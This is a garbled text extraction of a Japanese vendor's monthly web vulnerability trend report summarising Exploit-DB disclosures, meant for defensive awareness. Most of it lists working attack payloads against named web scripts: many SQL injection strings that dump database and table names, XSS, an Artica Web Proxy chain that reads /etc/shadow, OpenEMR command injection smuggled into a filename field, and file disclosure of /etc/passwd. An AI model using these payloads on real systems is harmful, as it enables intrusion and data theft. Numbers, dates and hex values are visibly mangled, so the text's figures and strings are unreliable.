EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0

Transcription

1 07.

2 EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 07年月に公開されたExploit-DBの脆弱性報告は 総件でした 月に公開された脆弱性数(5件)と比べると大幅で 約7割以上 上昇しました こういう上昇の原因はほとんどSQL injection SQLインジェクション 攻撃の増加によります また 月に公開されたSQL injection SQLインジェクション 攻撃の場合 完全に新しい方式ではなく ほとんどが既に公開されていた方式と同一な脆弱性や攻撃パターンでした SQL injection SQLインジェクション 攻撃は 攻撃が成功する場合 大きな被害を起こら せるが 比較的に攻撃コストが低いため 多くの攻撃者らが発展させて悪用しています こういう脆弱性を持続的に予防し セキュリティ性を維持させるための効果的な対応方案としてウェブアプリケーションファイアウォールを活用した深層防護(Defense indepth)を具現する 考えなければなりません. 脆弱性別 脆弱性カテゴリ ファイルアップロード(File Upload) ローカル ファイルインクルード(Local File Inclusion: LFI) クロスサイトスクリプティング(Cross Site Scripting: XSS) ディレクトリトラバーサル(Directory Traversal) コマンドインジェクション(Command Injection) SQLインジェクション(SQL Injection) 合計 脆弱性別 危険度別 危険度別 危険度 早急対応要 高 中 合計 06 4 割合 9.8%.54%.65% 00.00% 早急対応要 0 高. 攻撃実行の難易度別 中 6 0 難易度 難 中 易 合計 割合 4.4% 8.4% 4.6% 00.00% 攻撃実行の難易度別 4. 主なソフトウェア別脆弱性発生 ソフトウェア名 vbulletin Readymade Video Sharing Script FS Makemytrip Clone FS Grubhub Clone Multireligion Responsive Matrimonial Xerox DC60 EFI Fiery Controller Webtools Accesspress Anonymous Post Pro FS Amazon Clone Multivendor Penny Auction Clone Script FS Crowdfunding Script Car Rental Script FS Care Clone Joomla! Component User Bench FS Monster Clone Kickstarter Clone Acript FS Trademe Clone Professional Service Script FS Thumbtack Clone Advanced Real Estate Script PHP Melody Resume Clone Script MistServer Movie Guide Artica Web Proxy FAQ Pro Techno Portfolio Management Panel Hot Scripts Clone Readymade Classifieds Script Laundry Booking Script FS Lynda Clone Opensource Classified Ads Script WinduCMS FS Expedia Clone FS Shaadi Clone Multiplex Movie Theater Booking Script FS Indiamart Clone MLM Forex Market Plan Script FS Facebook Clone Muslim Matrimonial Script OpenEMR Vanguard DomainSale PHP Script FS Ebay Clone Website Auction Marketplace Joomla! Component JB Visa Realestate Crowdfunding Script Joomla! Component NextGen Editor FS Stackoverflow Clone Sendroid FS Shutterstock Clone DotNetNuke DreamSlider FS Quibids Clone Foodspotting Clone Script ソフトウェア名 Nearbuy Clone Script Secure E-commerce Script Cab Booking Script Lawyer Search Script Chartered Accountant Booking Script Online Exam Test Application Script Child Care Script PHP Multivendor Ecommerce CMS Auditor Website Readymade PHP Classified Script Co-work Space Search Script Responsive Realestate Script Consumer Complaints Clone Script Responsive Events & Movie Ticket Booking Script Entrepreneur Job Portal Script Single Theater Booking Script Doctor Search Script Entrepreneur Bus Booking Script E-commerce MLM Software MLM Forced Matrix Entrepreneur Dating Script Groupon Clone Script Event Calendar Category Script Advanced World Database FS Linkedin Clone Basic Job Site Script Video Gallery Joomla! Component Jbuildozer FS Freelancer Clone Question And Answer Bus Booking Script Linksys WVBR0 Paid To Read Script FS Gigs Script Piwigo FS Foodpanda Clone ITGuard-Manager Advance BB Script Cells Blog Advance Online Learning Management Script Joomla! Component Guru Pro Affiliate MLM Script Joomla! Component My Projects Basic BB Script BEIMS ContractorWeb Beauty Parlour Booking Script Biometric Shift Employee Management System Facebook Clone Script SilverStripe CMS Food Order Script Easy!Appointments Yoga Class Script FS Olx Clone Freelance Website Script 合計 6 5 難 中 易 9 主なソフトウェア別脆弱性発生 vbulletin Readymade Video Sharing Script FS Makemytrip Clone FS Grubhub Clone Multireligion Responsive Matrimonial Xerox DC60 EFI Fiery Controller Webtools Accesspress Anonymous Post Pro FS Amazon Clone Multivendor Penny Auction Clone Script FS Crowdfunding Script Car Rental Script FS Care Clone Joomla! Component User Bench FS Monster Clone

3 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です XSS 易高 MistServer. - XSS 脆弱性 /admin/api?command={"authorize":{"password":"666","usern ame":"<script>alert(document.body.innerhtml)</script>"}} MistServer MistServer Command Injection 中早急対応要 Artica Web Proxy.06 - Command Injection 脆弱性 /freeradius.users.php?username-formid=%c%fscript%e%cscript%evar%0xhr=new%0x MLHttpRequest();xhr.onreadystatechange=function(){if(xhr.sta tus==00){alert(xhr.responsetext);}};xhr.open(%7post%7, %7https://ip:port/system.terminal.php%7,true);xhr.setReq uestheader(%7content-type%7,%7application/x-wwwformurlencoded%7);xhr.send(%7cmdline=cat%0/etc/shadow %7);%C%Fscript%E%Cscript%E Artica Web Proxy Artica Web Proxy SQL Injection 中早急対応要 Techno Portfolio Management Panel.0 - 'id' /single.php?id=- 4++/*!08888UNION*/(/*!08888SELECT*/0x89,0x8 9,CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()), 0x849,0x859,0x869,0x879,(/*!08888SELECT */+GROUP_CONCAT(table_name+SEPARATOR+0xc67e) +/*!08888FROM*/+INFORMATION_SCHEMA.TABLES+/*!088 88WHERE*/+TABLE_SCHEMA=DATABASE()),0x899,0x8 09,0x89,0x89,0x89)-- Techno Portfolio Management Panel Techno Portfolio Management Panel SQL Injection 中早急対応要 Readymade Classifieds Script.0 /listings.php?catid=- ++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)))-- Readymade Classifieds Script Readymade Classifieds Script SQL Injection 易早急対応要 FS Makemytrip Clone - 'id' /pages.php?id= OR SLEEP(5) FS Makemytrip Clone FS Makemytrip Clone LFI 中中 WinduCMS. - Local File Disclosure 脆弱性 POST /contact_page?mn=contactform.message.negative HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ WinduCMS WinduCMS. [email protected]&content=<img src="/etc/passwd" SQL Injection 中早急対応要 FS Shaadi Clone - 'token' /view_profile.php?token=-5886' UNION ALL SELECT NULL,CONCAT(0x767877,0x65755a46504d6a d765a594a559556c44f4d76c e ,0x ),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL-- FS Shaadi Clone FS Shaadi Clone SQL Injection 中早急対応要 - 'id' /show_misc_video.php?id=id=-58 UNION ALL SELECT NULL,CONCAT(0x7766b67,0x454e4e656f6a7a c a f6d6b46774d6745a7a4e ,0x7707a707),NULL,NULL,NULL,NULL,NULL,N ULL SQL Injection 中早急対応要 FS Facebook Clone - 'token' /group.php?token=-86' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x ,0x546d597a a70475a50454e c e7a a6d ,0x7766a6a7),NULL,NULL,NULL, NULL,NULL-- FS Facebook Clone FS Facebook Clone Command Injection 中早急対応要 OpenEMR OS Command Injection POST /interface/fax/fax_dispatch.php?scan=x HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ OpenEMR OpenEMR form_save=&form_cb_copy=&form_cb_copy_type=&form _images[]=x&form_filename=' ls -al '&form_pid= SQL Injection 中早急対応要 DomainSale PHP Script.0 - 'id' /domain.php?id=4'++/*!union*/(/*!select*/ +0x89,/*!50000CONCAT_WS*/(0x0a0,USER(),DAT ABASE(),VERSION()),0x89,(/*!08888Select*/+export_set (5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informat ion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,)),0x859,0x869,0x879,0x88 9,0x899,0x809,0x89,0x89)-- DomainSale PHP Script DomainSale PHP Script SQL Injection 中早急対応要 Website Auction Marketplace 'cat_id' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Website Auction Marketplace Website Auction Marketplace SQL Injection 中早急対応要 Realestate Crowdfunding Script.7. - 'pid' /single-cause.php?pid=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(), (),(),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSI ON()),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9 ),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5))-- Realestate Crowdfunding Script Realestate Crowdfunding Script SQL Injection 中早急対応要 FS Thumbtack Clone.0 - 'cat' / 'sc' /browse-category.php?cat=- 9a87ff679afe7d98a67b754c'++/*!UNION */(/*!SELECT*/(),CONCAT_WS(0x0a0,USER(),DAT ABASE(),VERSION()),(),(4))-- /browse-scategory.php?sc=- 40cb96ac59075b964b075d4b70'++/*!UNI ON*/+/*!SELECT*/+,,CONCAT_WS(0x0a0,USER( ),DATABASE(),VERSION()),4,5,6,7,8,9-- FS Thumbtack Clone FS Thumbtack Clone SQL Injection 中早急対応要 FS Stackoverflow Clone.0 - 'keywords' POST /question/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ FS Stackoverflow Clone FS Stackoverflow Clone.0 keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''='

4 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 中早急対応要 FS Shutterstock Clone.0 - 'keywords' SQL Injection POST /Category/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keywords='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e,0x e05454e444e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' FS Shutterstock Clone FS Shutterstock Clone SQL Injection 易早急対応要 FS Quibids Clone.0 /itechd.php?productid=609 AND 65=65 FS Quibids Clone FS Quibids Clone SQL Injection 中早急対応要 FS Olx Clone.0 - 'scat' / 'pid' /subpage.php?scat=5'++union+all+select+,,,4,(sele CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 name,0xc67e))))x),6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6-- FS Olx Clone FS Olx Clone SQL Injection 中早急対応要 FS Monster Clone.0 - 'Employer_Details.php?id' /Employer_Details.php?id=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(SELE CT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(I NFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0 name,0xc67e))))x),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),() )-- FS Monster Clone FS Monster Clone SQL Injection 中早急対応要 FS Makemytrip Clone.0 - 'fl_orig' / 'fl_dest' /show-flightresult.php?&fl_orig=7'++union(select(),(),(),(4),(5),(6), (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(SELECT+GROUP_CONCAT(table_name+SEPA RATOR+0xc67e)+FROM+INFORMATION_SCHEMA.TABL ES+WHERE+TABLE_SCHEMA=DATABASE()),(5),(6),(7),( 8))-- FS Makemytrip Clone FS Makemytrip Clone SQL Injection 易早急対応要 Nearbuy Clone Script. - 'search' /category_list.php?search=s%' AND 775=775 AND '%'=' Nearbuy Clone Script Nearbuy Clone Script SQL Injection 中早急対応要 Cab Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Cab Booking Script Cab Booking Script SQL Injection 中早急対応要 Chartered Accountant Booking Script.0 - 'city' /servicelist?city=/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4,5,6, 7,8,9,0,,,CONCAT_WS(0x0a0,USER(),DATABASE (),VERSION()),4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--&main_search= Chartered Accountant Booking Script Chartered Accountant Booking Script SQL Injection 中早急対応要 Child Care Script.0 - 'city' /list?city=+/*!union*/+/*!select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Child Care Script Child Care Script SQL Injection 中早急対応要 SQL Injection 易早急対応要 SQL Injection 中早急対応要 CMS Auditor Website.0 Co-work Space Search Script.0 - 'city' Consumer Complaints Clone Script.0 - 'id' /news-detail/47%0and%0=-- CMS Auditor Website CMS Auditor Website.0 /list?city=%0and%0=--&main_search= Co-work Space Search Script Co-work Space Search Script.0 /other-user-profile.php?id=- '++/*!50000UNION*/(SELECT(),/*!CONCAT_WS*/(0 x0a0,user(),version()),(),(4),(5),(6),(7),(8),(9),(0),() Consumer Complaints Clone Script Consumer Complaints Clone Script.0,(),(),(4),(5),(6),(7),(8)) SQL Injection 中早急対応要 Entrepreneur Job Portal Script 'jobsearch_all.php?rid' /jobsearch_all.php?rid=- '++UNION(SELECT(),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 08888table_name*/,0xc6c69e,),/*!08888column_name* /,0xaa,)),@,)),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 ))-- Entrepreneur Job Portal Script Entrepreneur Job Portal Script SQL Injection 中早急対応要 Doctor Search Script.0 - 'city' /list?city=/*!union*/+/*!select*/+,,,4,5,6, 7,8,9,0,,,,4,5,6,7,8,9,0,,,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--&main_search= Doctor Search Script Doctor Search Script.0 /service_detail.php?pid=- 6'++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7)) SQL Injection 中早急対応要 E-commerce MLM Software.0 /event_detail.php?eventid=- 8'++UNION+ALL+SELECT+,(SELECT+GROUP_CONCAT(tabl e_name+separator+0xc67e)+from+information_ SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),, 4,5,6,7-- E-commerce MLM Software E-commerce MLM Software.0 /news_detail.php?newid=- 7'++UNION+ALL+SELECT+,(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA. COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f6646d696e) AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+,,0x0),0xa0,column_name,0xc67e)))))x),,4,5, SQL Injection 中早急対応要 Entrepreneur Dating Script.0. - 'marital' / 'gender' / 'country' / 'profileid' /search_result.php?marital=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),( 5),(5),(5),(54),(55),(56),(57),(58),(59),(60),(6),(6),(6),( 64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!0 8888select*/+count(*)/*!08888from*/(information_schema.c olumns)where@:=export_set(5,export_set(5,@,/*!08888table ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ))--&submit Entrepreneur Dating Script Entrepreneur Dating Script SQL Injection 中早急対応要 Event Calendar Category Script.0 - 'city' /event-list?city=- 76'+UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),CON CAT_WS(0x0a0,USER(),DATABASE(),VERSION()),(5),(6) Event Calendar Category Script Event Calendar Category Script.0,(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54))--&main_search=

5 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 中早急対応要 FS Linkedin Clone.0 - 'grid' / 'fid' / 'id' /group.php?grid=- '++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@ x:=0x00),(@nr:=0),(select(0)from(information_schem A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6746 FS Linkedin Clone FS Linkedin Clone.0 96f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD (@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e))))x),5,6,7,8,9,0,,,, SQL Injection 中早急対応要 FS Indiamart Clone.0 - 'token' / 'id' / 'c' SQL Injection 中早急対応要.0 - 'f' / 's' / 'id' /catcompany.php?token=- 79b5bad6ab90ce06895c9bde'++UNION(SELE CT(),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 FS Indiamart Clone FS Indiamart Clone.0 xc67e)+from+information_schema.tables+wher E+TABLE_SCHEMA=DATABASE()),(),(4),(5),(6))-- /movie.php?f=- 0++UNION(SELECT(),(),(),(4),(5),(6),(SELECT+GROUP_C ONCAT(table_name+SEPARATOR+0xc67e)+FROM+INFO RMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DAT ABASE()),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),( 9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4)) SQL Injection 中早急対応要 FS Grubhub Clone.0 - 'keywords' POST /food/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keywords=' UNION ALL SELECT,,,CONCAT(0x e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Grubhub Clone FS Grubhub Clone SQL Injection 中早急対応要 FS Groupon Clone.0 - 'id' /item_details.php?id=- ++UNION+ALL+SELECT+,,,4,5,6,7,(/*!08888Select*/+ex port_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/( FS Grubhub Clone FS Grubhub Clone.0 information_schema.columns)where@:=export_set(5,export_s et(5,@,/*!08888table_name*/,0xc6c69e,),/*!08888colu mn_name*/,0xaa,)),@,)),9,0,,,,4,5,6, SQL Injection 中早急対応要 FS Gigs Script.0 - 'cat' / 'sc' /browse-category.php?cat=- 8c4ca48a0b980dcc509a6f75849b'++/*!50000UNIO FS Gigs Script FS Gigs Script.0 N*/+/*!50000SELECT*/+,CONCAT_WS(0x0a0,USER(),D ATABASE(),VERSION()),,4, SQL Injection 中早急対応要 FS Freelancer Clone.0 - 'profile.php?u' /profile.php?u=c4ca48a0b980dcc509a6f75849b'++union+all+sele CT+,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0 xc67e)+from+information_schema.tables+wher FS Freelancer Clone FS Freelancer Clone.0 E+TABLE_SCHEMA=DATABASE()),,4,5,6,7,8,9,0,,,, 4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4, SQL Injection 中早急対応要 FS Ebay Clone.0 - 'id' / 'sub_category_id' / 'category_id' /product.php?id=- 9++UNION(SELECT(),(),(SELECT+GROUP_CONCAT(table_n ame+separator+0xc67e)+from+information_sch FS Ebay Clone FS Ebay Clone.0 EMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9), (0)) SQL Injection 中早急対応要 FS Crowdfunding Script.0 - 'latest_news_details.php?id' /latest_news_details.php?id=- 4'++UNION+ALL+SELECT+,,,4,5,CONCAT_WS(0x0a0, USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_se t(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(informa FS Crowdfunding Script FS Crowdfunding Script.0 tion_schema.columns)where@:=export_set(5,export_set(5,@,/ *!08888table_name*/,0xc6c69e,),/*!08888column_nam e*/,0xaa,)),@,)) SQL Injection 中早急対応要 FS Care Clone.0 - 'jobfrequency' / 'jobtype' /searchjob.php?jobtype=%0and%0=-- &jobfrequency=%0and%0=-- FS Care Clone FS Care Clone SQL Injection 中早急対応要 FS Amazon Clone.0 /p/verayari/- 9++UNION(SELECT(),(),CONCAT_WS(0x0a0,USER(),DA FS Amazon Clone FS Amazon Clone.0 TABASE(),VERSION()),(4),(5),(6),(7),(8),(9),(0),(),(),(), (4),(5),(6)) SQL Injection 中早急対応要 FS Trademe Clone.0 - 'search' / 'id' /search_item.php?search=s'++union+all+select+,,,4,5, CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),7,8, FS Trademe Clone FS Trademe Clone.0 9,0,,,, SQL Injection 中早急対応要 FS Expedia Clone.0 - 'fl_orig' / 'fl_dest' / 'id' /show-flightresult.php?fl_orig=5'++union(select(),(),(),(4),(5),(6),( 7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(0), (),(),(),(/*!08888Select*/+export_set(5,@:=0,(/*!0888 FS Expedia Clone FS Expedia Clone.0 8select*/+count(*)/*!08888from*/(information_schema.colu mns)where@:=export_set(5,export_set(5,@,/*!08888table_na me*/,0xc6c69e,),/*!08888column_name*/,0xaa,)),@, )),(5),(6),(7),(8)) SQL Injection 中早急対応要 FS Foodpanda Clone.0 POST /food/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keywords=' UNION ALL SELECT,,,CONCAT(0x e05454e444e),(/*!08888S elect*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!088 88from*/(information_schema.columns)where@:=export_set( 5,export_set(5,@,/*!08888table_name*/,0xc6c69e,),/*!0 8888column_name*/,0xaa,)),@,)),6,7,8,9,0,,,,4,5,6,7,8,9,0,,-- FS Foodpanda Clone FS Foodpanda Clone SQL Injection 中早急対応要 Advance BB Script.. - 'show_id' / 'pid' /tradeshow-list-detail.php?show_id=- '++UNION+ALL+SELECT+,(/*!Select*/+export_set(5,@:=0,(/*!select*/+count(*)/*!from*/(informatio n_schema.columns)where@:=export_set(5,export_set(5,@,/*! Advance BB Script Advance BB Script.. table_name*/,0xc6c69e,),/*!column_name* /,0xaa,)),@,)),,4,5,6,7,8,9,0,,,,4,5,6,7,8, 9,0,,,,4,5,6,7,8,9,0,,,,4,5,6,7, 8,9,40,4,4,4,44,45,46,47,48,49,50,5,5,5,54,55,56,5 7,58,59,60,6,6,6,64,65,66, SQL Injection 中早急対応要 Advance Online Learning Management Script. - 'subcatid' / 'popcourseid' /courselist.php?subcatid=- 9'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(7),(8),(9),CONCAT_WS(0x0a0 Advance Online Learning,USER(),DATABASE(),VERSION()),(),(),(),(4),(5),(6), Management Script (7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9)) -- Advance Online Learning Management Script SQL Injection 易早急対応要 SQL Injection 中早急対応要 Affiliate MLM Script.0 - 'product-category.php?key' Basic BB Script 'product_details.php?id' /product-category.php?key=a%' AND 546=546 AND '%'=' Affiliate MLM Script Affiliate MLM Script.0 /product_details.php?id=- 48'++/*!7UNION*/+/*!7SELECT*/+,,CONCAT_ WS(0x0a0,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,0 Basic BB Script Basic BB Script.0.8,,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,4--

6 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 中早急対応要 Beauty Parlour Booking Script.0 - 'gender' / 'city' /beautyparloursearch/list?gender='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,, Beauty Parlour Booking Script Beauty Parlour Booking Script.0,4,5,6,7,8,9,0,,,CONCAT_WS(0x0a0,USER (),DATABASE(),VERSION()),4,5,6,7,8,9,40,4,4,4,4 4,45,46,47,48,49,50,5,5--+-&main_search= SQL Injection 中早急対応要 Facebook Clone Script.0 - 'id' / 'send' /friend-profile.php?id=- '++/*!UNION*/(SELECT(),CONCAT_WS(0x0a0,U Facebook Clone Script Facebook Clone Script.0 SER(),DATABASE(),VERSION())) SQL Injection 中早急対応要 Food Order Script.0 - 'list?city' /list?city='++union(select(),(),(),(4),(5),(6),(7),(8),(9),(0 ),(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(),( ),CONCAT_WS(0x0a0,USER(),DATABASE(),VERSION()),( Food Order Script Food Order Script.0 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(40),(4),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5 ),(5))--+-&main_search= SQL Injection 中早急対応要 Yoga Class Script.0 - 'list?city' /list?city=- '+/*!0UNION*/+/*!0SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Yoga Class Script Yoga Class Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,50,5,5--+-&main_search= SQL Injection 中早急対応要 Freelance Website Script 'pr_id' / 'catid' /jobdetails.php?pr_id=- '++UNION(SELECT(),(),(),(4),(5),(/*!08888Select*/+expor t_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(inf ormation_schema.columns)where@:=export_set(5,export_set( 5,@,/*!08888table_name*/,0xc6c69e,),/*!08888column_ name*/,0xaa,)),@,)),(7),(8),(9),(0),(),(),(),(4),(5 ),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),(8 Freelance Website Script Freelance Website Script.0.6 ),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49),(50),(5),(5),(5),(54 ),(55),(56),(57),(58),(59),(60),(6),(6),(6),(64),(65),(66),(67 ),(68),(69),(70),(7),(7),(7),(74),(75),(76),(77),(78),(79),(80 ),(8),(8),(8),(84),(85),(86),(87),(88),(89),(90),(9),(9),(9 ),(94),(95),(96),(97),(98),(99),(00)) SQL Injection 中早急対応要 Hot Scripts Clone. - 'subctid' / 'mctid' /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELEC T(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCH EMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,L PAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67 e))))x)-- Hot Scripts Clone Hot Scripts Clone SQL Injection 中早急対応要 Foodspotting Clone Script.0 - 'quicksearch.php?q' /quicksearch.php?q=- '++UNION(SELECT(),(/*!08888Select*/+export_set(5,@:=0, (/*!08888select*/+count(*)/*!08888from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0888 Foodspotting Clone Script Foodspotting Clone Script.0 8table_name*/,0xc6c69e,),/*!08888column_name*/,0xa a,)),@,)),(),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),( 5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(0),()) SQL Injection 易早急対応要 SQL Injection 